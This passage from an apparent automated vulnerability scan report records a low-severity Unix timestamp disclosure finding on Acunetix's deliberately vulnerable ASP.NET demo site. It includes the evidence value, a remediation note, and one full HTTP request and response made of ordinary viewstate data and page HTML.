style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          190515149
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        4. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          190515149, which evaluates to: 1976-01-15 08:52:29

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bdfic04fJFrwdgOeBd3JBjK63E5g%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
